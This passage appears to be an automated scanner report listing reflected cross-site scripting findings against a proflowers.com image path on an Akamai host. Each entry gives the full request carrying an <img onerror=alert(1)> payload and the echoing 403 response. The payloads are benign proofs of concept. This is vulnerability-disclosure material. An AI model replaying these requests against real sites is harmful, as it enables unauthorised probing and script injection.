The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload c211e<img%20src%3da%20onerror%3dalert(1)>87d2347cfbd was submitted in REST URL parameter 9 and was echoed, URL-decoded, as c211e<img src=a onerror=alert(1)>87d2347cfbd.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PFc211e<img%20src%3da%20onerror%3dalert(1)>87d2347cfbd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inltpnkrosalea_victin10_PFc211e<img src=a onerror=alert(1)>87d2347cfbd

4.120. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload f0c74<img%20src%3da%20onerror%3dalert(1)>ba3c5695188 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as f0c74<img src=a onerror=alert(1)>ba3c5695188.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PFf0c74<img%20src%3da%20onerror%3dalert(1)>ba3c5695188?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PFf0c74<img src=a onerror=alert(1)>ba3c5695188

4.121. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload e53ea<img%20src%3da%20onerror%3dalert(1)>797c7d57c08 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as e53ea<img src=a onerror=alert(1)>797c7d57c08.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_le53ea<img%20src%3da%20onerror%3dalert(1)>797c7d57c08?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkanthur_sqwht09_le53ea<img src=a onerror=alert(1)>797c7d57c08

4.122. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload ec4fd<img%20src%3da%20onerror%3dalert(1)>179007b844c was submitted in REST URL parameter 9 and was echoed, URL-decoded, as ec4fd<img src=a onerror=alert(1)>179007b844c.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PFec4fd<img%20src%3da%20onerror%3dalert(1)>179007b844c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PFec4fd<img src=a onerror=alert(1)>179007b844c

4.123. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload 962c9<img%20src%3da%20onerror%3dalert(1)>9f2e498f529 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 962c9<img src=a onerror=alert(1)>9f2e498f529.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF962c9<img%20src%3da%20onerror%3dalert(1)>9f2e498f529?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF962c9<img src=a onerror=alert(1)>9f2e498f529

4.124. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload 1aae3<img%20src%3da%20onerror%3dalert(1)>6ccde723029 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 1aae3<img src=a onerror=alert(1)>6ccde723029.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF1aae3<img%20src%3da%20onerror%3dalert(1)>6ccde723029?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF1aae3<img src=a onerror=alert(1)>6ccde723029

4.125. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload 3be1c<img%20src%3da%20onerror%3dalert(1)>33e58a7dff5 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 3be1c<img src=a onerror=alert(1)>33e58a7dff5.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF3be1c<img%20src%3da%20onerror%3dalert(1)>33e58a7dff5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:06 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF3be1c<img src=a onerror=alert(1)>33e58a7dff5

4.126. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload da54c<img%20src%3da%20onerror%3dalert(1)>2d8a02251de was submitted in REST URL parameter 9 and was echoed, URL-decoded, as da54c<img src=a onerror=alert(1)>2d8a02251de.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PFda54c<img%20src%3da%20onerror%3dalert(1)>2d8a02251de?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inrosylwurn_victin10_PFda54c<img src=a onerror=alert(1)>2d8a02251de

4.127. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload fb488<img%20src%3da%20onerror%3dalert(1)>9985bf4a860 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as fb488<img src=a onerror=alert(1)>9985bf4a860.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_lfb488<img%20src%3da%20onerror%3dalert(1)>9985bf4a860?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6insucculent_zinc09_lfb488<img src=a onerror=alert(1)>9985bf4a860

4.128. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload 2bf12<img%20src%3da%20onerror%3dalert(1)>307ef96990b was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 2bf12<img src=a onerror=alert(1)>307ef96990b.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF2bf12<img%20src%3da%20onerror%3dalert(1)>307ef96990b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF2bf12<img src=a onerror=alert(1)>307ef96990b

4.129. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload 9953a<img%20src%3da%20onerror%3dalert(1)>0606794631f was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 9953a<img src=a onerror=alert(1)>0606794631f.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l9953a<img%20src%3da%20onerror%3dalert(1)>0606794631f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT8inspath_wdtpr09_l9953a<img src=a onerror=alert(1)>0606794631f

4.130. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload 93ba9<img%20src%3da%20onerror%3dalert(1)>0ab92364043 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 93ba9<img src=a onerror=alert(1)>0ab92364043.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ93ba9<img%20src%3da%20onerror%3dalert(1)>0ab92364043?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:34 GMT
Connection: close

Unable to find /ProvideCommerce/PLT_8inwhpot_PC1795_SQ93ba9<img src=a onerror=alert(1)>0ab92364043

4.131. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload 6afb8<img%20src%3da%20onerror%3dalert(1)>a4c35050e8d was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 6afb8<img src=a onerror=alert(1)>a4c35050e8d.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF6afb8<img%20src%3da%20onerror%3dalert(1)>a4c35050e8d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLTangeltree10_PF6afb8<img src=a onerror=alert(1)>a4c35050e8d

4.132. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload f3028<img%20src%3da%20onerror%3dalert(1)>05cd2cada1f was submitted in REST URL parameter 9 and was echoed, URL-decoded, as f3028<img src=a onerror=alert(1)>05cd2cada1f.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PFf3028<img%20src%3da%20onerror%3dalert(1)>05cd2cada1f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLTazaleabons10_bloom_PFf3028<img src=a onerror=alert(1)>05cd2cada1f

4.133. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload 9510f<img%20src%3da%20onerror%3dalert(1)>aefbe9bcc3 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 9510f<img src=a onerror=alert(1)>aefbe9bcc3.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF9510f<img%20src%3da%20onerror%3dalert(1)>aefbe9bcc3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
